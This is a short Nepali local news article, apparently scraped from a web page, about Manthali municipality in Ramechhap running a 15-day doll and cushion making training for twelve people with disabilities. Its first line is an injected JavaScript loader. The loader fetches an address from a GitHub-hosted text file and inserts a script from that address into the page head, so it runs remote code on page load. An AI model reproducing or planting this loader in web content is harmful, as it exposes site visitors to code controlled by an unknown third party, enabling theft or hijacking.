;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
फागुन २५,
रामेछाप । मन्थली नगरपालिकामा शारिरीक क्षमता फरक भएकाहरुको लागि १५ दिने डल, कुशन बनाउने तालिम पनि सुरु भएको छ ।
‘क’ वर्गका पहेलो कार्ड भएकाहरुलाई विशेष प्राथामिकताको शारिरीक कम्जोर क्षमता भएकाहरुको लागि बसिबसी डल बनाउने तालिम सुरु गरेको महिला, बालबालिका तथा सामाजिक परिचालन उप शाखाकी भगवती तामाङले बताइन् । उनले तालिममा १४ वटै वडाबाट छनोटमा परेका १२ जनाको सहभागिता रहेको जानकारी दिइन् ।
तालिममा सहभागि भएका ७५ प्रतिशले ले राम्रो नतिजा राम्रो नतिजा ल्याउनेमा आशावादी रहेको प्रशिक्षले प्रवर्ती लिम्बुले बताइन् । नगरपालिकाको वार्षिक कार्यक्रम अन्तर्गत नै तालिम संचालन भएको शाखाकी तामाङले बताइन् ।
फेसबुक प्रतिक्रियाहरु